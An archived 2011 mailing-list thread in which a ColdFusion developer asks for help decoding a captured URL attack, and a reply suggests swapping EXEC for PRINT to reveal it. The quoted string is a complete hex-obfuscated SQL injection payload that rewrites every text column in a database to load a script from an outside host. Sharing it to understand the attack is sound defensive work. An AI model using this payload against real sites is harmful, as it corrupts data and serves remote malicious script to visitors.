RE: Can anyone decode this?

Fri, 13 May 2011 07:39:39 -0700 

Put this in your SQL Query analyzer tool and change the EXEC at the end to
PRINT.  It should print out the SQL Statement for you to see what they were
trying to do.

Cheers,

Jeff 

-----Original Message-----
From: Che Vilnonis [mailto:ch...@asitv.com] 
Sent: Friday, May 13, 2011 7:31 AM
To: cf-talk
Subject: Can anyone decode this?


Can anyone decode this? This was a URL attack that was caught by some custom
code. I tried decoding the string at
http://meyerweb.com/eric/tools/dencoder/ but had no luck.

113|736;DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363
726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652027272522
3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D
672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727272946455443
48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40432045
4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C65
5F437572736F72 AS CHAR(4000));EXEC(@S); 

Thanks, Che






~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344495
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Reply via email to